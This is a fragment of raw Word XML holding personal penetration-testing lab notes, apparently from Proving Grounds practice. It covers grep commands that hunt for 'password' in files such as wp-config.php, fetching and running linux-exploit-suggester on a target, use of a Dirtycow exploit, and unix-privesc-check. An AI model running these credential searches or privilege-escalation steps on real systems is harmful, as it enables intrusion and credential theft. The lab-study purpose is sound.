      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -r "password" /path/to/dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000149C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000149D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful flags:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000149E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: ignore case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000149F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: show line numbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: limit to specific file types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep 'pattern' --include="*.txt" ./*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-dir</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: skip specific directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="278"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rn --exclude-dir="node_modules" "password" .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look through file for "password" case in-sensitive:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="854"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -ni "password" filename.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -Rin password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wp-config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"R" is for recursive but this is just a file so idk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are looking for "password" in wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n4 is supposed to be for looking at 4 lines before and after the line that matches so you can see context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId386">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e96</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014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B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x2u8xja1rrep" w:id="173"/>
      <w:bookmarkEnd w:id="173"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f6f8soyanoc0" w:id="174"/>
      <w:bookmarkEnd w:id="174"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux-exploit-suggester</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First seen on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId387">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lampiao</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A useful script to check for exploits on Linux machines is linux exploit suggester.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId388">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mzet-/linux-exploit-suggester</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To download (run these on target machine):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x les.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./lesh.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2298700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="425" name="image410.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image410.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38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14C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we see here, we have two possible vulnerabilities. We ended up using the Dirtycow 2 vulnerability and the cool thing about this tool is that it gives you the link (as underlined in red) of the exploit from exploit-db, which is what we used </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jmzzsmbhhev" w:id="175"/>
      <w:bookmarkEnd w:id="175"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unix-privesc-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C7">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we learned in the previous section, Linux systems contain a wealth of information that can be used for further attacks. However, collecting this detailed information manually can be rather time-consuming. Fortunately, we can use various scripts to automate this process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get an initial baseline of the target system, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId390">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId391">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">unix-privesc-check</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on UNIX derivatives such as Linux. This Bash script is pre-installed on our local Kali machine at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/unix-privesc-check</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it performs several checks to find any system misconfigurations that can be abused for local privilege escalation. We can review the tool's details by running the script without any arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4043363" cy="2002242"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="471" name="image454.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image454.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId392"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4043363" cy="2002242"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
